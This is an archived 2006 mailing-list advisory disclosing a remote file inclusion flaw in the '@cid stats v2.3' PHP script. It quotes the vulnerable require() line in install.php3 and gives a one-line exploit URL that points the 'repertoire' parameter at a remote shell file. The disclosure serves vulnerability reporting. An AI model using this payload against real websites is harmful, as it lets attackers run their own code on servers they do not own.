Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_60_2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability

Stanford university SCARF user editing

[ECHO_ADV_59_2006]Ago ra 1.4 RC1  "$_SESSION[PATH _COMPOSANT]" Remote File Inclusion Vulnerability

[ECHO_ADV_58_2006]Cyb erfolio <=2.0 RC1 $av  Remote File Inclusion Vulnerability

From:	mahmood ali <mah_k_2000_(at)_hotmail.com>
Date:	06.11.2006
Subject:	@cid stats v2.3 File Include

###################################################
@cid stats v2.3  File Include
###################################################
Source Code:

http://www.comscripts.com/jump.php?action=script&id=1115
###################################################
Vulnerable Code:_

install.php3
###################################################
In Line 41 :_

require("'.$repertoire."/".'stats_fonctions.php3
###################################################
Exploit :_

http://www.VicTim.com/[@]/install.php3?repertoire=ShElL.txt?
###################################################

Discoverd By :  Mahmood_ali
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM &
WwW.Tryag.CoM

###################################################

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb